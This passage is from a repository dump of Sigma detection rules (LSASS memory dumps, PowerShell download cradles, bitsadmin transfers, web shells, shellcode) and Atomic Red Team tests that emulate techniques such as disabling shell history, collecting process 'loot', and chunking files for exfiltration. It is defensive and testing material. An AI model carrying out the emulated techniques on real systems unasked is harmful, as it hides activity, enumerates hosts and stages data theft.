| 10 | supported_platforms: 11 | - windows 12 | 13 | input_arguments: 14 | input_source_code: 15 | description: Path to source of C# code 16 | type: path 17 | default: PathToAtomicsFolder\T1010\src\T1010.cs 18 | output_file_name: 19 | description: Name of output binary 20 | type: string 21 | default: T1010.exe 22 | 23 | executor: 24 | name: command_prompt 25 | elevation_required: false 26 | command: | 27 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe -out:#{output_file_name} #{input_source_code} 28 | #{output_file_name} 29 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/powershell_downgrade_attack.yml: -------------------------------------------------------------------------------- 1 | title: PowerShell Downgrade Attack 2 | id: 6331d09b-4785-4c13-980f-f96661356249 3 | status: experimental 4 | description: Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0 5 | references: 6 | - http://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/ 7 | tags: 8 | - attack.defense_evasion 9 | - attack.execution 10 | - attack.t1086 11 | author: Florian Roth (rule), Lee Holmes (idea) 12 | logsource: 13 | product: windows 14 | service: powershell-classic 15 | detection: 16 | selection: 17 | EventID: 400 18 | EngineVersion: '2.*' 19 | filter: 20 | HostVersion: '2.*' 21 | condition: selection and not filter 22 | falsepositives: 23 | - Penetration Test 24 | - Unknown 25 | level: medium 26 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_susp_script_execution.yml: -------------------------------------------------------------------------------- 1 | title: WSF/JSE/JS/VBA/VBE File Execution 2 | id: 1e33157c-53b1-41ad-bbcc-780b80b58288 3 | status: experimental 4 | description: Detects suspicious file execution by wscript and cscript 5 | author: Michael Haag 6 | tags: 7 | - attack.execution 8 | - attack.t1064 9 | logsource: 10 | category: process_creation 11 | product: windows 12 | detection: 13 | selection: 14 | Image: 15 | - '*\wscript.exe' 16 | - '*\cscript.exe' 17 | CommandLine: 18 | - '*.jse' 19 | - '*.vbe' 20 | - '*.js' 21 | - '*.vba' 22 | condition: selection 23 | fields: 24 | - CommandLine 25 | - ParentCommandLine 26 | falsepositives: 27 | - Will need to be tuned. I recommend adding the user profile path in CommandLine if it is getting too noisy. 28 | level: medium 29 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/sysmon_lsass_memdump.yml: -------------------------------------------------------------------------------- 1 | title: LSASS Memory Dump 2 | id: 5ef9853e-4d0e-4a70-846f-a9ca37d876da 3 | status: experimental 4 | description: Detects process LSASS memory dump using procdump or taskmgr based on the CallTrace pointing to dbghelp.dll or dbgcore.dll for win10 5 | author: Samir Bousseaden 6 | references: 7 | - https://blog.menasec.net/2019/02/threat-hunting-21-procdump-or-taskmgr.html 8 | tags: 9 | - attack.t1003 10 | - attack.s0002 11 | - attack.credential_access 12 | logsource: 13 | product: windows 14 | service: sysmon 15 | detection: 16 | selection: 17 | EventID: 10 18 | TargetImage: 'C:\windows\system32\lsass.exe' 19 | GrantedAccess: '0x1fffff' 20 | CallTrace: 21 | - '*dbghelp.dll*' 22 | - '*dbgcore.dll*' 23 | condition: selection 24 | falsepositives: 25 | - unknown 26 | level: high 27 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_exploit_cve_2017_0261.yml: -------------------------------------------------------------------------------- 1 | title: Exploit for CVE-2017-0261 2 | id: 864403a1-36c9-40a2-a982-4c9a45f7d833 3 | status: experimental 4 | description: Detects Winword starting uncommon sub process FLTLDR.exe as used in exploits for CVE-2017-0261 and CVE-2017-0262 5 | references: 6 | - https://www.fireeye.com/blog/threat-research/2017/05/eps-processing-zero-days.html 7 | author: Florian Roth 8 | date: 2018/02/22 9 | tags: 10 | - attack.defense_evasion 11 | - attack.privilege_escalation 12 | - attack.t1055 13 | logsource: 14 | category: process_creation 15 | product: windows 16 | detection: 17 | selection: 18 | ParentImage: '*\WINWORD.EXE' 19 | Image: '*\FLTLDR.exe*' 20 | condition: selection 21 | falsepositives: 22 | - Several false positives identified, check for suspicious file names or locations (e.g. Temp folders) 23 | level: medium 24 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_process_creation_bitsadmin_download.yml: -------------------------------------------------------------------------------- 1 | title: Bitsadmin Download 2 | id: d059842b-6b9d-4ed1-b5c3-5b89143c6ede 3 | status: experimental 4 | description: Detects usage of bitsadmin downloading a file 5 | references: 6 | - https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin 7 | - https://isc.sans.edu/diary/22264 8 | tags: 9 | - attack.defense_evasion 10 | - attack.persistence 11 | - attack.t1197 12 | - attack.s0190 13 | author: Michael Haag 14 | logsource: 15 | category: process_creation 16 | product: windows 17 | detection: 18 | selection: 19 | Image: 20 | - '*\bitsadmin.exe' 21 | CommandLine: 22 | - /transfer 23 | condition: selection 24 | fields: 25 | - CommandLine 26 | - ParentCommandLine 27 | falsepositives: 28 | - Some legitimate apps use this, but limited. 29 | level: medium 30 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_susp_rottenpotato.yml: -------------------------------------------------------------------------------- 1 | title: RottenPotato Like Attack Pattern 2 | id: 16f5d8ca-44bd-47c8-acbe-6fc95a16c12f 3 | status: experimental 4 | description: Detects logon events that have characteristics of events generated during an attack with RottenPotato and the like 5 | references: 6 | - https://twitter.com/SBousseaden/status/1195284233729777665 7 | author: "@SBousseaden, Florian Roth" 8 | date: 2019/11/15 9 | tags: 10 | - attack.privilege_escalation 11 | - attack.credential_access 12 | - attack.t1171 13 | logsource: 14 | product: windows 15 | service: security 16 | detection: 17 | selection: 18 | EventID: 4624 19 | LogonType: 3 20 | TargetUserName: 'ANONYMOUS_LOGON' 21 | WorkstationName: '-' 22 | SourceNetworkAddress: '127.0.0.1' 23 | condition: selection 24 | falsepositives: 25 | - Unknown 26 | level: high 27 | -------------------------------------------------------------------------------- /elemental/media/atomics/T1153.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | attack_technique: T1153 3 | display_name: Source 4 | 5 | atomic_tests: 6 | - name: Execute Script using Source 7 | description: | 8 | Creates a script and executes it using the source command 9 | 10 | supported_platforms: 11 | - macos 12 | - linux 13 | 14 | executor: 15 | name: sh 16 | command: | 17 | sh -c "echo 'echo Hello from the Atomic Red Team' > /tmp/art.sh" 18 | chmod +x /tmp/art.sh 19 | source /tmp/art.sh 20 | 21 | - name: Execute Script using Source Alias 22 | description: | 23 | Creates a script and executes it using the source command's dot alias 24 | 25 | supported_platforms: 26 | - macos 27 | - linux 28 | 29 | executor: 30 | name: sh 31 | command: | 32 | sh -c "echo 'echo Hello from the Atomic Red Team' > /tmp/art.sh" 33 | chmod +x /tmp/art.sh 34 | . /tmp/art.sh 35 | 36 | -------------------------------------------------------------------------------- /elemental/media/atomics/T1500.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | attack_technique: T1500 3 | display_name: Compile After Delivery 4 | 5 | atomic_tests: 6 | - name: Compile After Delivery using csc.exe 7 | description: | 8 | Compile C# code using csc.exe binary used by .NET 9 | 10 | supported_platforms: 11 | - windows 12 | 13 | input_arguments: 14 | input_file: 15 | description: C# code that launches calc.exe from a hidden cmd.exe Window 16 | type: file 17 | default: $PathToAtomicsFolder\T1500\src\calc.cs 18 | output_file: 19 | description: Output compiled binary 20 | type: file 21 | default: C:\Windows\Temp\T1500.exe 22 | 23 | executor: 24 | name: command_prompt 25 | elevation_required: false 26 | command: | 27 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:#{output_file} #{input_file} 28 | cleanup_command: | 29 | del #{output_file} -------------------------------------------------------------------------------- /elemental/media/atomics/T1518.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | attack_technique: T1518 3 | display_name: Software Discovery 4 | 5 | atomic_tests: 6 | - name: Find and Display Iinternet Explorer Browser Version 7 | description: | 8 | Adversaries may attempt to get a listing of non-security related software that is installed on the system. Adversaries may use the information from Software Discovery during automated discovery to shape follow-on behaviors 9 | 10 | supported_platforms: 11 | - windows 12 | 13 | executor: 14 | name: command_prompt 15 | elevation_required: false # indicates whether command must be run with admin privileges. If the elevation_required attribute is not defined, the value is assumed to be false 16 | command: | # these are the actaul attack commands, at least one command must be provided 17 | reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer" /v svcVersion 18 | 19 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_hack_smbexec.yml: -------------------------------------------------------------------------------- 1 | title: smbexec.py Service Installation 2 | id: 52a85084-6989-40c3-8f32-091e12e13f09 3 | description: Detects the use of smbexec.py tool by detecting a specific service installation 4 | author: Omer Faruk Celik 5 | date: 2018/03/20 6 | references: 7 | - https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/ 8 | tags: 9 | - attack.lateral_movement 10 | - attack.execution 11 | - attack.t1077 12 | - attack.t1035 13 | logsource: 14 | product: windows 15 | service: system 16 | detection: 17 | service_installation: 18 | EventID: 7045 19 | ServiceName: 'BTOBTO' 20 | ServiceFileName: '*\execute.bat' 21 | condition: service_installation 22 | fields: 23 | - ServiceName 24 | - ServiceFileName 25 | falsepositives: 26 | - Penetration Test 27 | - Unknown 28 | level: critical -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_rdp_potential_cve-2019-0708.yml: -------------------------------------------------------------------------------- 1 | title: Potential RDP exploit CVE-2019-0708 2 | id: aaa5b30d-f418-420b-83a0-299cb6024885 3 | description: Detect suspicious error on protocol RDP, potential CVE-2019-0708 4 | references: 5 | - https://github.com/zerosum0x0/CVE-2019-0708 6 | - https://github.com/Ekultek/BlueKeep 7 | tags: 8 | - attack.initial_access 9 | - attack.lateral_movement 10 | - attack.t1210 11 | - attack.t1190 12 | - car.2013-07-002 13 | status: experimental 14 | author: "Lionel PRAT, Christophe BROCAS, @atc_project (improvements)" 15 | logsource: 16 | product: windows 17 | service: system 18 | detection: 19 | selection: 20 | EventID: 21 | - 56 22 | - 50 23 | Source: TermDD 24 | condition: selection 25 | falsepositives: 26 | - Bad connections or network interruptions 27 | level: high 28 | 29 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_workflow_compiler.yml: -------------------------------------------------------------------------------- 1 | title: Microsoft Workflow Compiler 2 | id: 419dbf2b-8a9b-4bea-bf99-7544b050ec8d 3 | status: experimental 4 | description: Detects invocation of Microsoft Workflow Compiler, which may permit the execution of arbitrary unsigned code. 5 | tags: 6 | - attack.defense_evasion 7 | - attack.execution 8 | - attack.t1127 9 | author: Nik Seetharaman 10 | references: 11 | - https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb 12 | logsource: 13 | category: process_creation 14 | product: windows 15 | detection: 16 | selection: 17 | Image: '*\Microsoft.Workflow.Compiler.exe' 18 | condition: selection 19 | fields: 20 | - CommandLine 21 | - ParentCommandLine 22 | falsepositives: 23 | - Legitimate MWC use (unlikely in modern enterprise environments) 24 | level: high 25 | -------------------------------------------------------------------------------- /elemental/media/atomics/T1030.md: -------------------------------------------------------------------------------- 1 | # T1030 - Data Transfer Size Limits 2 | ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1030) 3 |
An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts.
4 | 5 | ## Atomic Tests 6 | 7 | - [Atomic Test #1 - Data Transfer Size Limits](#atomic-test-1---data-transfer-size-limits) 8 | 9 | 10 |
11 | 12 | ## Atomic Test #1 - Data Transfer Size Limits 13 | Take a file/directory, split it into 5Mb chunks 14 | 15 | **Supported Platforms:** macOS, CentOS, Ubuntu, Linux 16 | 17 | 18 | #### Run it with `sh`! 19 | ``` 20 | cd /tmp/ 21 | dd if=/dev/urandom of=/tmp/victim-whole-file bs=25M count=1 22 | split -b 5000000 /tmp/victim-whole-file 23 | ls -l 24 | ``` 25 | 26 | 27 | 28 |
29 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/powershell_shellcode_b64.yml: -------------------------------------------------------------------------------- 1 | title: PowerShell ShellCode 2 | id: 16b37b70-6fcf-4814-a092-c36bd3aafcbd 3 | status: experimental 4 | description: Detects Base64 encoded Shellcode 5 | references: 6 | - https://twitter.com/cyb3rops/status/1063072865992523776 7 | tags: 8 | - attack.privilege_escalation 9 | - attack.execution 10 | - attack.t1055 11 | - attack.t1086 12 | author: David Ledbetter (shellcode), Florian Roth (rule) 13 | date: 2018/11/17 14 | logsource: 15 | product: windows 16 | service: powershell 17 | description: 'Script block logging must be enabled' 18 | detection: 19 | selection: 20 | EventID: 4104 21 | keyword1: 22 | - '*AAAAYInlM*' 23 | keyword2: 24 | - '*OiCAAAAYInlM*' 25 | - '*OiJAAAAYInlM*' 26 | condition: selection and keyword1 and keyword2 27 | falsepositives: 28 | - Unknown 29 | level: critical 30 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/sysmon_rdp_reverse_tunnel.yml: -------------------------------------------------------------------------------- 1 | title: RDP over Reverse SSH Tunnel 2 | id: 5f699bc5-5446-4a4a-a0b7-5ef2885a3eb4 3 | status: experimental 4 | description: Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389 5 | references: 6 | - https://twitter.com/SBousseaden/status/1096148422984384514 7 | author: Samir Bousseaden 8 | date: 2019/02/16 9 | tags: 10 | - attack.defense_evasion 11 | - attack.command_and_control 12 | - attack.t1076 13 | - car.2013-07-002 14 | logsource: 15 | product: windows 16 | service: sysmon 17 | detection: 18 | selection: 19 | EventID: 3 20 | Image: '*\svchost.exe' 21 | Initiated: 'true' 22 | SourcePort: 3389 23 | DestinationIp: 24 | - '127.*' 25 | - '::1' 26 | condition: selection 27 | falsepositives: 28 | - unknown 29 | level: high 30 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_mmc_spawn_shell.yml: -------------------------------------------------------------------------------- 1 | title: MMC Spawning Windows Shell 2 | id: 05a2ab7e-ce11-4b63-86db-ab32e763e11d 3 | status: experimental 4 | description: Detects a Windows command line executable started from MMC. 5 | author: Karneades, Swisscom CSIRT 6 | tags: 7 | - attack.lateral_movement 8 | - attack.t1175 9 | logsource: 10 | category: process_creation 11 | product: windows 12 | detection: 13 | selection: 14 | ParentImage: '*\mmc.exe' 15 | Image: 16 | - '*\cmd.exe' 17 | - '*\powershell.exe' 18 | - '*\wscript.exe' 19 | - '*\cscript.exe' 20 | - '*\sh.exe' 21 | - '*\bash.exe' 22 | - '*\reg.exe' 23 | - '*\regsvr32.exe' 24 | - '*\BITSADMIN*' 25 | condition: selection 26 | fields: 27 | - CommandLine 28 | - Image 29 | - ParentCommandLine 30 | level: high 31 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_susp_openwith.yml: -------------------------------------------------------------------------------- 1 | title: OpenWith.exe executes specified binary 2 | id: cec8e918-30f7-4e2d-9bfa-a59cc97ae60f 3 | status: experimental 4 | description: The OpenWith.exe executes other binary 5 | references: 6 | - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/LOLUtilz/OSBinaries/Openwith.yml 7 | - https://twitter.com/harr0ey/status/991670870384021504 8 | author: Beyu Denis, oscd.community (rule), @harr0ey (idea) 9 | date: 2019/10/12 10 | modified: 2019/11/04 11 | tags: 12 | - attack.defense_evasion 13 | - attack.execution 14 | - attack.t1218 15 | level: high 16 | logsource: 17 | category: process_creation 18 | product: windows 19 | detection: 20 | selection: 21 | Image|endswith: '\OpenWith.exe' 22 | CommandLine|contains: '/c' 23 | condition: selection 24 | falsepositives: 25 | - Legitimate use of OpenWith.exe by legitimate user 26 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_susp_recon_activity.yml: -------------------------------------------------------------------------------- 1 | title: Suspicious Reconnaissance Activity 2 | id: d95de845-b83c-4a9a-8a6a-4fc802ebf6c0 3 | status: experimental 4 | description: Detects suspicious command line activity on Windows systems 5 | author: Florian Roth 6 | tags: 7 | - attack.discovery 8 | - attack.t1087 9 | logsource: 10 | category: process_creation 11 | product: windows 12 | detection: 13 | selection: 14 | CommandLine: 15 | - net group "domain admins" /domain 16 | - net localgroup administrators 17 | condition: selection 18 | fields: 19 | - CommandLine 20 | - ParentCommandLine 21 | falsepositives: 22 | - Inventory tool runs 23 | - Penetration tests 24 | - Administrative activity 25 | analysis: 26 | recommendation: Check if the user that executed the commands is suspicious (e.g. service accounts, LOCAL_SYSTEM) 27 | level: medium 28 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_user_added_to_local_administrators.yml: -------------------------------------------------------------------------------- 1 | title: User Added to Local Administrators 2 | id: c265cf08-3f99-46c1-8d59-328247057d57 3 | description: This rule triggers on user accounts that are added to the local Administrators group, which could be legitimate activity or a sign of privilege escalation 4 | activity 5 | status: stable 6 | author: Florian Roth 7 | tags: 8 | - attack.privilege_escalation 9 | - attack.t1078 10 | logsource: 11 | product: windows 12 | service: security 13 | detection: 14 | selection: 15 | EventID: 4732 16 | selection_group1: 17 | GroupName: 'Administrators' 18 | selection_group2: 19 | GroupSid: 'S-1-5-32-544' 20 | filter: 21 | SubjectUserName: '*$' 22 | condition: selection and (1 of selection_group*) and not filter 23 | falsepositives: 24 | - Legitimate administrative activity 25 | level: medium 26 | -------------------------------------------------------------------------------- /elemental/media/atomics/T1057.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | attack_technique: T1057 3 | display_name: Process Discovery 4 | 5 | atomic_tests: 6 | - name: Process Discovery - ps 7 | description: | 8 | Utilize ps to identify processes 9 | 10 | supported_platforms: 11 | - macos 12 | - centos 13 | - ubuntu 14 | - linux 15 | 16 | input_arguments: 17 | output_file: 18 | description: path of output file 19 | type: path 20 | default: /tmp/loot.txt 21 | 22 | executor: 23 | name: sh 24 | elevation_required: false 25 | command: | 26 | ps >> #{output_file} 27 | ps aux >> #{output_file} 28 | 29 | - name: Process Discovery - tasklist 30 | description: | 31 | Utilize tasklist to identify processes 32 | 33 | supported_platforms: 34 | - windows 35 | 36 | executor: 37 | name: command_prompt 38 | elevation_required: false 39 | command: | 40 | tasklist 41 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/av_webshell.yml: -------------------------------------------------------------------------------- 1 | title: Antivirus Web Shell Detection 2 | id: fdf135a2-9241-4f96-a114-bb404948f736 3 | description: Detects a highly relevant Antivirus alert that reports a web shell 4 | date: 2018/09/09 5 | modified: 2019/10/04 6 | author: Florian Roth 7 | references: 8 | - https://www.nextron-systems.com/2018/09/08/antivirus-event-analysis-cheat-sheet-v1-4/ 9 | tags: 10 | - attack.persistence 11 | - attack.t1100 12 | logsource: 13 | product: antivirus 14 | detection: 15 | selection: 16 | Signature: 17 | - "PHP/Backdoor*" 18 | - "JSP/Backdoor*" 19 | - "ASP/Backdoor*" 20 | - "Backdoor.PHP*" 21 | - "Backdoor.JSP*" 22 | - "Backdoor.ASP*" 23 | - "*Webshell*" 24 | condition: selection 25 | fields: 26 | - FileName 27 | - User 28 | falsepositives: 29 | - Unlikely 30 | level: critical 31 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/sysmon_ads_executable.yml: -------------------------------------------------------------------------------- 1 | title: Executable in ADS 2 | id: b69888d4-380c-45ce-9cf9-d9ce46e67821 3 | status: experimental 4 | description: Detects the creation of an ADS data stream that contains an executable (non-empty imphash) 5 | references: 6 | - https://twitter.com/0xrawsec/status/1002478725605273600?s=21 7 | tags: 8 | - attack.defense_evasion 9 | - attack.t1027 10 | - attack.s0139 11 | author: Florian Roth, @0xrawsec 12 | date: 2018/06/03 13 | logsource: 14 | product: windows 15 | service: sysmon 16 | definition: 'Requirements: Sysmon config with Imphash logging activated' 17 | detection: 18 | selection: 19 | EventID: 15 20 | filter: 21 | Imphash: '00000000000000000000000000000000' 22 | condition: selection and not filter 23 | fields: 24 | - TargetFilename 25 | - Image 26 | falsepositives: 27 | - unknown 28 | level: critical 29 | 30 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/sysmon_susp_lsass_dll_load.yml: -------------------------------------------------------------------------------- 1 | title: DLL Load via LSASS 2 | id: b3503044-60ce-4bf4-bbcb-e3db98788823 3 | status: experimental 4 | description: Detects a method to load DLL via LSASS process using an undocumented Registry key 5 | author: Florian Roth 6 | date: 2019/10/16 7 | references: 8 | - https://blog.xpnsec.com/exploring-mimikatz-part-1/ 9 | - https://twitter.com/SBousseaden/status/1183745981189427200 10 | logsource: 11 | product: windows 12 | service: sysmon 13 | detection: 14 | selection: 15 | EventID: 16 | - 12 17 | - 13 18 | TargetObject: 19 | - '*\CurrentControlSet\Services\NTDS\DirectoryServiceExtPt*' 20 | - '*\CurrentControlSet\Services\NTDS\LsaDbExtPt*' 21 | condition: selection 22 | tags: 23 | - attack.execution 24 | - attack.t1177 25 | falsepositives: 26 | - Unknown 27 | level: high 28 | 29 | -------------------------------------------------------------------------------- /elemental/media/atomics/T1148.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | attack_technique: T1148 3 | display_name: HISTCONTROL 4 | 5 | atomic_tests: 6 | - name: Disable history collection 7 | description: | 8 | Disables history collection in shells 9 | supported_platforms: 10 | - linux 11 | - macos 12 | input_arguments: 13 | evil_command: 14 | description: Command to run after shell history collection is disabled 15 | type: String 16 | default: whoami 17 | executor: 18 | name: sh 19 | command: | 20 | export HISTCONTROL=ignoreboth 21 | ls #{evil_command} 22 | 23 | - name: Mac HISTCONTROL 24 | description: | 25 | 26 | supported_platforms: 27 | - macos 28 | - linux 29 | 30 | executor: 31 | name: manual 32 | steps: | 33 | 1. export HISTCONTROL=ignoreboth 34 | 2. echo export "HISTCONTROL=ignoreboth" >> ~/.bash_profile 35 | 3. ls 36 | 4. whoami > recon.txt 37 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_exploit_cve_2015_1641.yml: -------------------------------------------------------------------------------- 1 | title: Exploit for CVE-2015-1641 2 | id: 7993792c-5ce2-4475-a3db-a3a5539827ef 3 | status: experimental 4 | description: Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641 5 | references: 6 | - https://www.virustotal.com/en/file/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8/analysis/ 7 | - https://www.hybrid-analysis.com/sample/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8?environmentId=100 8 | author: Florian Roth 9 | date: 2018/02/22 10 | tags: 11 | - attack.defense_evasion 12 | - attack.t1036 13 | logsource: 14 | category: process_creation 15 | product: windows 16 | detection: 17 | selection: 18 | ParentImage: '*\WINWORD.EXE' 19 | Image: '*\MicroScMgmt.exe ' 20 | condition: selection 21 | falsepositives: 22 | - Unknown 23 | level: critical 24 | -------------------------------------------------------------------------------- /elemental/media/atomics/T1058.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | attack_technique: T1058 3 | display_name: Service Registry Permissions Weakness 4 | 5 | atomic_tests: 6 | - name: Service Registry Permissions Weakness 7 | description: | 8 | Service registry permissions weakness check and then which can lead to privilege escalation with ImagePath. eg. 9 | reg add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /v ImagePath /d "C:\temp\AtomicRedteam.exe" 10 | 11 | supported_platforms: 12 | - windows 13 | 14 | input_arguments: 15 | weak_service_name: 16 | description: weak service check 17 | type: Registry 18 | default: weakservicename 19 | 20 | executor: 21 | name: powershell 22 | elevation_required: false 23 | command: | 24 | get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\* |FL 25 | get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name} |FL 26 | 27 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/lnx_auditd_masquerading_crond.yml: -------------------------------------------------------------------------------- 1 | title: Masquerading as Linux crond process 2 | id: 9d4548fa-bba0-4e88-bd66-5d5bf516cda0 3 | status: experimental 4 | description: Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and 5 | observation. Several different variations of this technique have been observed. 6 | author: Timur Zinniatullin, oscd.community 7 | date: 2019/10/21 8 | references: 9 | - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.yaml 10 | logsource: 11 | product: linux 12 | service: auditd 13 | detection: 14 | selection: 15 | type: 'execve' 16 | a0: 'cp' 17 | a1: '-i' 18 | a2: '/bin/sh' 19 | a3: '*/crond' 20 | condition: selection 21 | level: medium 22 | tags: 23 | - attack.defense_evasion 24 | - attack.t1036 25 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_powershell_download.yml: -------------------------------------------------------------------------------- 1 | title: PowerShell Download from URL 2 | id: 3b6ab547-8ec2-4991-b9d2-2b06702a48d7 3 | status: experimental 4 | description: Detects a Powershell process that contains download commands in its command line string 5 | author: Florian Roth 6 | tags: 7 | - attack.t1086 8 | - attack.execution 9 | logsource: 10 | category: process_creation 11 | product: windows 12 | detection: 13 | selection: 14 | Image: '*\powershell.exe' 15 | CommandLine: 16 | - '*new-object system.net.webclient).downloadstring(*' 17 | - '*new-object system.net.webclient).downloadfile(*' 18 | - '*new-object net.webclient).downloadstring(*' 19 | - '*new-object net.webclient).downloadfile(*' 20 | condition: selection 21 | fields: 22 | - CommandLine 23 | - ParentCommandLine 24 | falsepositives: 25 | - unknown 26 | level: medium 27 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_susp_samr_pwset.yml: -------------------------------------------------------------------------------- 1 | title: Possible Remote Password Change Through SAMR 2 | id: 7818b381-5eb1-4641-bea5-ef9e4cfb5951 3 | description: Detects a possible remote NTLM hash change through SAMR API SamiChangePasswordUser() or SamSetInformationUser(). "Audit User Account Management" in "Advanced 4 | Audit Policy Configuration" has to be enabled in your local security policy / GPO to see this events. 5 | author: Dimitrios Slamaris 6 | tags: 7 | - attack.credential_access 8 | - attack.t1212 9 | logsource: 10 | product: windows 11 | service: security 12 | detection: 13 | samrpipe: 14 | EventID: 5145 15 | RelativeTargetName: samr 16 | passwordchanged: 17 | EventID: 4738 18 | passwordchanged_filter: 19 | PasswordLastSet: null 20 | timeframe: 15s 21 | condition: ( passwordchanged and not passwordchanged_filter ) | near samrpipe 22 | level: medium 23 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_susp_tscon_rdp_redirect.yml: -------------------------------------------------------------------------------- 1 | title: Suspicious RDP Redirect Using TSCON 2 | id: f72aa3e8-49f9-4c7d-bd74-f8ab84ff9bbb 3 | status: experimental 4 | description: Detects a suspicious RDP session redirect using tscon.exe 5 | references: 6 | - http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html 7 | - https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6 8 | tags: 9 | - attack.lateral_movement 10 | - attack.privilege_escalation 11 | - attack.t1076 12 | - car.2013-07-002 13 | author: Florian Roth 14 | date: 2018/03/17 15 | modified: 2018/12/11 16 | logsource: 17 | category: process_creation 18 | product: windows 19 | detection: 20 | selection: 21 | CommandLine: '* /dest:rdp-tcp:*' 22 | condition: selection 23 | falsepositives: 24 | - Unknown 25 | level: high 26 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/apt_equationgroup_dll_u_load.yml: -------------------------------------------------------------------------------- 1 | title: Equation Group DLL_U Load 2 | id: d465d1d8-27a2-4cca-9621-a800f37cf72e 3 | author: Florian Roth 4 | description: Detects a specific tool and export used by EquationGroup 5 | references: 6 | - https://github.com/adamcaudill/EquationGroupLeak/search?utf8=%E2%9C%93&q=dll_u&type= 7 | - https://securelist.com/apt-slingshot/84312/ 8 | - https://twitter.com/cyb3rops/status/972186477512839170 9 | tags: 10 | - attack.execution 11 | - attack.g0020 12 | - attack.t1059 13 | - attack.defense_evasion 14 | - attack.t1085 15 | logsource: 16 | category: process_creation 17 | product: windows 18 | detection: 19 | selection1: 20 | Image: '*\rundll32.exe' 21 | CommandLine: '*,dll_u' 22 | selection2: 23 | CommandLine: '* -export dll_u *' 24 | condition: 1 of them 25 | falsepositives: 26 | - Unknown 27 | level: critical 28 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/sysmon_password_dumper_lsass.yml: -------------------------------------------------------------------------------- 1 | title: Password Dumper Remote Thread in LSASS 2 | id: f239b326-2f41-4d6b-9dfa-c846a60ef505 3 | description: Detects password dumper activity by monitoring remote thread creation EventID 8 in combination with the lsass.exe process as TargetImage. The process 4 | in field Process is the malicious program. A single execution can lead to hundreds of events. 5 | references: 6 | - https://jpcertcc.github.io/ToolAnalysisResultSheet/details/WCE.htm 7 | status: stable 8 | author: Thomas Patzke 9 | logsource: 10 | product: windows 11 | service: sysmon 12 | detection: 13 | selection: 14 | EventID: 8 15 | TargetImage: 'C:\Windows\System32\lsass.exe' 16 | StartModule: null 17 | condition: selection 18 | tags: 19 | - attack.credential_access 20 | - attack.t1003 21 | - attack.s0005 22 | falsepositives: 23 | - unknown 24 | level: high 25 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_netsh_packet_capture.yml: -------------------------------------------------------------------------------- 1 | title: Capture a Network Trace with netsh.exe 2 | id: d3c3861d-c504-4c77-ba55-224ba82d0118 3 | status: experimental 4 | description: Detects capture a network trace via netsh.exe trace functionality 5 | references: 6 | - https://blogs.msdn.microsoft.com/canberrapfe/2012/03/30/capture-a-network-trace-without-installing-anything-capture-a-network-trace-of-a-reboot/ 7 | author: Kutepov Anton, oscd.community 8 | date: 2019/10/24 9 | tags: 10 | - attack.discovery 11 | - attack.t1040 12 | logsource: 13 | category: process_creation 14 | product: windows 15 | detection: 16 | selection: 17 | CommandLine|contains|all: 18 | - netsh 19 | - trace 20 | - start 21 | condition: selection 22 | falsepositives: 23 | - Legitimate administrator or user uses netsh.exe trace functionality for legitimate reason 24 | level: medium 25 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_susp_bginfo.yml: -------------------------------------------------------------------------------- 1 | title: Application 